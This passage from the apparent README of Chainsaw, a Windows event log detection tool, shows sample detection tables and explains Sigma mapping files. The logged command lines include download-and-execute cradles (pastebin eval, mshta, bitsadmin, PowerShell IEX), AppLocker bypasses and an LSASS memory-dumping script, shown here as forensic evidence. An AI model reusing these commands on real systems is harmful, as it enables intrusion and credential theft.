("WinHttp.WinHttpRequest.5.1");h.Open("GET","http: │ - │ │ │ │ │ │ //pastebin.com/raw/y2CjnRtH",false);try{h.Send();b │ - │ │ │ │ │ │ =h.ResponseText;eval(b);}catch(e){new%%20ActiveXOb │ - │ │ │ │ │ │ ject("WScript.Shell").Run("cmd /c taskkill /f /im │ - │ │ │ │ │ │ out.exe",0,true);} │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:11:17 │ 1 │ ‣ Suspicious Rundll32 Activity │ "MSEDGEWIN10" │ C:\Windows\System32\rundll32.exe │ "C:\Windows\system32\rundll32.exe" Shell32.dll,Con │ - │ │ │ │ │ │ trol_RunDLL "C:\Users\IEUser\Downloads\Invoice@058 │ - │ │ │ │ │ │ 2.cpl", │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:11:17 │ 1 │ ‣ Suspicious Call by Ordinal │ "MSEDGEWIN10" │ C:\Windows\SysWOW64\rundll32.exe │ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\Sys │ - │ │ │ │ │ │ WOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\ │ - │ │ │ │ │ │ Invoice@0582.cpl", │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:32:58 │ 1 │ ‣ Suspicious Certutil Command │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c certutil -f -decode fi.b64 AllTheThings.dll │ - │ │ │ │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:32:59 │ 1 │ ‣ Suspicious Certutil Command │ "MSEDGEWIN10" │ C:\Windows\System32\certutil.exe │ certutil -f -decode fi.b64 AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:03 │ 1 │ ‣ Bitsadmin Download │ "MSEDGEWIN10" │ C:\Windows\System32\bitsadmin.exe │ bitsadmin.exe /transfer "JobName" https://raw.gith │ - │ │ │ │ │ │ ubusercontent.com/op7ic/EDR-Testing-Script/master/ │ - │ │ │ │ │ │ Payloads/CradleTest.txt "C:\Windows\system32\Defau │ - │ │ │ │ │ │ lt_File_Path.ps1" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:18 │ 1 │ ‣ Mshta JavaScript Execution │ "MSEDGEWIN10" │ C:\Windows\System32\mshta.exe │ mshta.exe javascript:a=GetObject("script:https://r │ - │ │ │ ‣ Suspicious Rundll32 Activity │ │ │ aw.githubusercontent.com/op7ic/EDR-Testing-Script/ │ - │ │ │ │ │ │ master/Payloads/Mshta_calc.sct").Exec();close(); │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:23 │ 1 │ ‣ Encoded PowerShell Command │ "MSEDGEWIN10" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ powershell -c "(New-Object Net.WebClient).Download │ - │ │ │ Line │ │ ell.exe │ File('https://raw.githubusercontent.com/op7ic/EDR- │ - │ │ │ ‣ Non Interactive PowerShell │ │ │ Testing-Script/master/Payloads/CradleTest.txt','De │ - │ │ │ │ │ │ fault_File_Path.ps1');IEX((-Join([IO.File]::ReadAl │ - │ │ │ │ │ │ lBytes('Default_File_Path.ps1')|ForEach-Object{[Ch │ - │ │ │ │ │ │ ar]$_})))" │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:28 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.303 │ - │ │ │ │ │ │ 19\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:28 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │ - │ │ │ │ │ │ 27\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:29 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegS │ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regs │ - │ │ │ │ │ vcs.exe │ vcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:29 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.5 │ - │ │ │ │ │ │ 0727\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:29 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.3 │ - │ │ │ │ │ │ 0319\regsvcs.exe AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-29 21:33:34 │ 1 │ ‣ Possible Applocker Bypass │ "MSEDGEWIN10" │ C:\Windows\System32\cmd.exe │ cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.507 │ - │ │ │ │ │ │ 27\regasm.exe /U AllTheThings.dll │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-12-04 22:41:04 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k localService -p │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ -s RemoteRegistry │ - │ │ │ Parent Directory │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-12-09 16:52:34 │ 1 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\psexecprivesc.exe │ "C:\Users\Public\psexecprivesc.exe" C:\Windows\Sys │ - │ │ │ Folder │ │ │ tem32\mspaint.exe │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-12-09 16:52:41 │ 1 │ ‣ PsExec Service Start │ "MSEDGEWIN10" │ C:\Windows\PSEXESVC.exe │ C:\Windows\PSEXESVC.exe │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-01-26 13:21:13 │ 1 │ ‣ Possible Applocker Bypass │ "LAPTOP-JU4M3I0E" │ C:\Program Files (x86)\Microsoft Visual Studio\201 │ C:\Program Files (x86)\Microsoft Visual Studio\201 │ - │ │ │ │ │ 9\Community\MSBuild\Current\Bin\MSBuild.exe │ 9\Community\MSBuild\Current\Bin\MSBuild.exe /nolog │ - │ │ │ │ │ │ o /nodemode:1 /nodeReuse:true /low:false │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-01-26 13:21:14 │ 1 │ ‣ Non Interactive PowerShell │ "LAPTOP-JU4M3I0E" │ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh │ powershell.exe start-process notepad.exe │ - │ │ │ │ │ ell.exe │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-20 20:32:55 │ 1 │ ‣ Non Interactive PowerShell │ "MSEDGEWIN10" │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ "C:\Windows\System32\WindowsPowerShell\v1.0\powers │ - │ │ │ │ │ ell.exe │ hell.exe" -Version 5.1 -s -NoLogo -NoProfile │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-20 20:33:13 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k netsvcs -p -s g │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ psvc │ - │ │ │ Parent Directory │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-20 20:33:14 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k LocalService -p │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ -s fdPHost │ - │ │ │ Parent Directory │ │ │ │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-22 22:09:26 │ 1 │ ‣ Windows Processes Suspicious │ "MSEDGEWIN10" │ C:\Windows\System32\services.exe │ C:\Windows\system32\services.exe 652 "lsass.dmp" a │ - │ │ │ Parent Directory │ │ │ 708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2021-04-22 22:09:35 │ 1 │ ‣ Suspicious Svchost Process │ "MSEDGEWIN10" │ C:\Windows\System32\svchost.exe │ C:\Windows\system32\svchost.exe -k LocalService -p │ - │ │ │ ‣ Windows Processes Suspicious │ │ │ -s fdPHost │ - │ │ │ Parent Directory │ │ │ │ - └─────────────────────┴────┴──────────────────────────────────────────┴────────────────────────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘ - - [+] Detection: Suspicious File Creation - ┌─────────────────────┬────┬────────────────────────────────┬────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.TargetFilename │ image │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-05-14 14:04:05 │ 11 │ ‣ Hijack Legit RDP Session │ "alice.insecurebank.local" │ C:\Users\administrator\AppData\Roaming\Microsoft\W │ C:\Windows\system32\mstsc.exe │ - │ │ │ to Move Laterally │ │ indows\Start Menu\Programs\Startup\cmd.exe │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-07-19 14:45:31 │ 11 │ ‣ Startup Folder File Write │ "MSEDGEWIN10" │ C:\ProgramData\Microsoft\Windows\Start Menu\Progra │ C:\Windows\System32\WindowsPowerShell\v1.0\powersh │ - │ │ │ │ │ ms\StartUp\Notepad.lnk │ ell.exe │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-02-10 08:28:12 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Windows\System32\drivers\VBoxDrv.sys │ c:\Users\Public\BYOV\TDL\Furutaka.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-07-03 08:47:21 │ 11 │ ‣ Suspicious Desktopimgdownldr │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Local\Temp\Personalization │ C:\Windows\System32\svchost.exe │ - │ │ │ Target File │ │ \LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc3 │ │ - │ │ │ │ │ 19JaA.7z │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:33 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Roaming\WINWORD.exe │ C:\Users\Public\tools\apt\wwlib\test.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:33 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Roaming\wwlib.dll │ C:\Users\Public\tools\apt\wwlib\test.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-23 21:57:34 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_r │ c:\Users\Public\test.tmp │ - │ │ │ Folder │ │ ar_sfx_access_check_2914968 │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-23 21:57:34 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 │ c:\Users\Public\test.tmp │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-11-26 17:38:11 │ 11 │ ‣ Execution from Suspicious │ "LAPTOP-JU4M3I0E" │ C:\Users\Public\tools\privesc\uac\system32\npmprox │ C:\Users\Public\tools\privesc\uac\byeintegrity5-ua │ - │ │ │ Folder │ │ y.dll │ c.exe │ - └─────────────────────┴────┴────────────────────────────────┴────────────────────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘ - - - [+] Detection: Windows Defender Detections - ┌─────────────────────┬──────┬───────────────┬───────────────────────────────────┬────────────────────────────────────────────────────┬───────────────────────┐ - │ system_time │ id │ computer │ threat_name │ threat_file │ user │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:40:00 │ 1116 │ "MSEDGEWIN10" │ "Trojan:PowerShell/Powersploit.M" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1056\\Get-Keystrokes.ps1" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:40:16 │ 1116 │ "MSEDGEWIN10" │ "Trojan:XML/Exeselrun.gen!A" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1086\\payloads\\test.xsl" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:41:16 │ 1116 │ "MSEDGEWIN10" │ "HackTool:JS/Jsprat" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:41:17 │ 1116 │ "MSEDGEWIN10" │ "Backdoor:ASP/Ace.T" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1100\\shells\\cmd.aspx" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:41:48 │ 1116 │ "MSEDGEWIN10" │ "Trojan:Win32/Sehyioa.A!cl" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1218\\src\\Win32\\T1218-2.dll" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:51:50 │ 1116 │ "MSEDGEWIN10" │ "HackTool:JS/Jsprat" │ "containerfile:_C:\\AtomicRedTeam\\atomic-red-team │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ -master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\ │ │ - │ │ │ │ │ AtomicRedTeam\\atomic-red-team-master\\atomics\\T1 │ │ - │ │ │ │ │ 100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\Atomic │ │ - │ │ │ │ │ RedTeam\\atomic-red-team-master\\atomics\\T1100\\s │ │ - │ │ │ │ │ hells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTea │ │ - │ │ │ │ │ m\\atomic-red-team-master\\atomics\\T1100\\shells\ │ │ - │ │ │ │ │ \b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\ato │ │ - │ │ │ │ │ mic-red-team-master\\atomics\\T1100\\shells\\b.jsp │ │ - │ │ │ │ │ ->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-re │ │ - │ │ │ │ │ d-team-master\\atomics\\T1100\\shells\\b.jsp->(SCR │ │ - │ │ │ │ │ IPT0068)" │ │ - └─────────────────────┴──────┴───────────────┴───────────────────────────────────┴────────────────────────────────────────────────────┴───────────────────────┘ - - [+] Detection: Suspicious Image Load - ┌─────────────────────┬────┬─────────────────────────────┬───────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ image_loaded │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-27 18:47:00 │ 7 │ ‣ Execution from Suspicious │ "IEWIN7" │ C:\Users\Public\KeeFarce.exe │ C:\Users\Public\BootstrapDLL.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-05-18 17:16:18 │ 7 │ ‣ In-memory PowerShell │ "IEWIN7" │ C:\Windows\System32\notepad.exe │ C:\Windows\assembly\NativeImages_v2.0.50727_32\Sys │ - │ │ │ │ │ │ tem.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e │ - │ │ │ │ │ │ \System.Management.Automation.ni.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-05-23 17:26:08 │ 7 │ ‣ XSL Script Processing │ "IEWIN7" │ \\vboxsrv\HTools\msxsl.exe │ C:\Windows\System32\msxml3.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-06-14 22:22:31 │ 7 │ ‣ WMI Modules Loaded │ "IEWIN7" │ C:\Users\IEUser\Downloads\a.exe │ C:\Windows\System32\wbem\wmiutils.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-06-14 22:23:26 │ 7 │ ‣ WMI Modules Loaded │ "IEWIN7" │ C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\B │ C:\Windows\System32\wbem\wmiutils.dll │ - │ │ │ │ │ RE6BgE2JubB.exe │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-08-30 12:54:08 │ 7 │ ‣ WMI Modules Loaded │ "MSEDGEWIN10" │ C:\Windows\System32\cscript.exe │ C:\Windows\System32\wbem\wmiutils.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-08-02 16:24:07 │ 7 │ ‣ Fax Service DLL Search │ "MSEDGEWIN10" │ C:\Windows\System32\FXSSVC.exe │ C:\Windows\System32\Ualapi.dll │ - │ │ │ Order Hijack │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-15 13:17:02 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\tendyron.exe │ C:\Users\Public\tools\apt\OnKeyToken_KEB.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:28 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:28 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:31 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:31 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - └─────────────────────┴────┴─────────────────────────────┴───────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘ - - [+] Detection: Suspicious Powershell ScriptBlock - ┌─────────────────────┬──────┬──────────────────────────┬───────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.ScriptBlockText │ - ├─────────────────────┼──────┼──────────────────────────┼───────────────┼────────────────────────────────────────────────────┤ - │ 2020-06-30 14:24:08 │ 4104 │ ‣ PowerShell Get-Process │ "MSEDGEWIN10" │ function Memory($path){ $Process = Get-Process ls │ - │ │ │ LSASS in ScriptBlock │ │ ass$DumpFilePath = $path$WER = [PSObject].Assembly │ - │ │ │ │ │ .GetType('System.Management.Automation.WindowsErro │ - │ │ │ │ │ rReporting')$WERNativeMethods = $WER.GetNestedType │ - │ │ │ │ │ ('NativeMethods', 'NonPublic')$Flags = [Reflection │ - │ │ │ │ │ .BindingFlags] 'NonPublic, Static'$MiniDumpWriteDu │ - │ │ │ │ │ mp = $WERNativeMethods.GetMethod('MiniDumpWriteDum │ - │ │ │ │ │ p', $Flags)$MiniDumpWithFullMemory = [UInt32] 2 #$ │ - │ │ │ │ │ ProcessId = $Process.Id$ProcessName = $Process.Nam │ - │ │ │ │ │ e$ProcessHandle = $Process.Handle$ProcessFileName │ - │ │ │ │ │ = "$($ProcessName).dmp"$ProcessDumpPath = Join-Pat │ - │ │ │ │ │ h $DumpFilePath $ProcessFileName$FileStream = New- │ - │ │ │ │ │ Object IO.FileStream($ProcessDumpPath, [IO.FileMod │ - │ │ │ │ │ e]::Create) $Result = $MiniDumpWriteDump.Invoke($n │ - │ │ │ │ │ ull, @($ProcessHandle,$ProcessId,$FileStream.SafeF │ - │ │ │ │ │ ileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[ │ - │ │ │ │ │ IntPtr]::Zero,[IntPtr]::Zero)) $FileStream.Close() │ - │ │ │ │ │ if (-not $Result){$Exception = New-Object Componen │ - │ │ │ │ │ tModel.Win32Exception$ExceptionMessage = "$($Excep │ - │ │ │ │ │ tion.Message) ($($ProcessName):... │ - │ │ │ │ │ │ - │ │ │ │ │ (use --full to show all content) │ - └─────────────────────┴──────┴──────────────────────────┴───────────────┴────────────────────────────────────────────────────┘ - - [+] Detection: System log was cleared - ┌─────────────────────┬─────┬───────────────────────────────────┬──────────────┐ - │ system_time │ id │ computer │ subject_user │ - ├─────────────────────┼─────┼───────────────────────────────────┼──────────────┤ - │ 2019-03-19 23:34:25 │ 104 │ "PC01.example.corp" │ "user01" │ - ├─────────────────────┼─────┼───────────────────────────────────┼──────────────┤ - │ 2020-09-15 19:28:31 │ 104 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - └─────────────────────┴─────┴───────────────────────────────────┴──────────────┘ - - [+] Detection: New User Created - ┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┬──────────────────────────────────────────────────┐ - │ system_time │ id │ computer │ target_username │ user_sid │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┼──────────────────────────────────────────────────┤ - │ 2020-09-16 09:31:19 │ 4720 │ "01566s-win16-ir.threebeesco.com" │ "$" │ "S-1-5-21-308926384-506822093-3341789130-107103" │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┼──────────────────────────────────────────────────┤ - │ 2020-09-16 09:32:13 │ 4720 │ "01566s-win16-ir.threebeesco.com" │ "$" │ "S-1-5-21-308926384-506822093-3341789130-107104" │ - └─────────────────────┴──────┴───────────────────────────────────┴─────────────────┴──────────────────────────────────────────────────┘ - - [+] Detection: User added to interesting group - ┌─────────────────────┬──────┬───────────────┬───────────────────────────┬─────────────────────────────────────────────────┬──────────────────┐ - │ system_time │ id │ computer │ change_type │ user_sid │ target_group │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤ - │ 2019-09-22 11:22:05 │ 4732 │ "MSEDGEWIN10" │ User added to local group │ "S-1-5-21-3461203602-4096304019-2269080069-501" │ "Administrators" │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤ - │ 2019-09-22 11:23:19 │ 4732 │ "MSEDGEWIN10" │ User added to local group │ "S-1-5-20" │ "Administrators" │ - └─────────────────────┴──────┴───────────────┴───────────────────────────┴─────────────────────────────────────────────────┴──────────────────┘ - - -## How to add support for more rules -The following sections will guide you through how to work with Chainsaw's mapping files in order to add support for additional Sigma rules that may be unsupported by Chainsaw's default configuration. - -### What is the mapping file? -In order to support Sigma rule detection logic, Chainsaw requires a 'mapping file' to specify: - - - Which event IDs to process - - Which fields in the event logs are important - - Which fields to include when displaying the output of Chainsaw - -The included sigma mapping in the "mapping_files" directory already supports most of the key Event IDs, but if you want to add support for additional event IDs or use additional event log fields in a Sigma rule then you'll need to augment the mapping file. - -Let's take a look at the default mapping file that ships with Chainsaw. The mapping file is written in Yaml and contains three top level keys: - - - kind - - exclusions - - mappings - -#### Kind - - # Supported values are Stalker and Sigma - kind: sigma - -The 'kind' key tells Chainsaw whether the specified rules are in a Sigma rule format, or in a Stalker rule format. For the vast majority of Chainsaw users you're going to be using the Sigma rule format. Stalker rules are a custom rule format that are used at F-Secure and are not publicly available. - -*Tl;Dr - Unless you know what you're doing, leave this key set to 'sigma'* - -#### Exclusions - - exclusions: - - "Wuauclt Network Connection" - - "Exports Registry Key To an Alternate Data Stream" - - "NetNTLM Downgrade Attack" - - "Non Interactive PowerShell" - -The exclusions key tells Chainsaw to ignore certain rules by their name. For example, in testing we found that the 'Non Interactive PowerShell' Sigma rule is very noisy and resulted in significant bloat to the output of Chainsaw. The default mapping files specifies this rule name in the 'exclusions' key to skip this rule if it's provided. - -Tl;Dr - *You can use the exclusions sections of the mapping file to skip certain rules by name* - -#### Mappings - - mappings: - 1: <----- Event ID - title: "Suspicious Process Creation" - provider: "Microsoft-Windows-Sysmon" <----- Event Provider - search_fields: <---- Map Sigma fields to Event Log Fields - Image: "Event.EventData.Image" - CommandLine: "Event.EventData.CommandLine" - ParentImage: "Event.EventData.ParentImage" - ParentCommandLine: "Event.EventData.ParentCommandLine" - OriginalFileName: "Event.EventData.OriginalFileName" - table_headers: <------- Which fields to output in table/csv/json - context_field: "Event.EventData.Image" - command_line: "Event.EventData.CommandLine" - -The mappings key is the core part of the mappings file. This section tells Chainsaw: - - - What event IDs to process (e.g. Event ID 4104) - - What event ID provider to process (e.g. 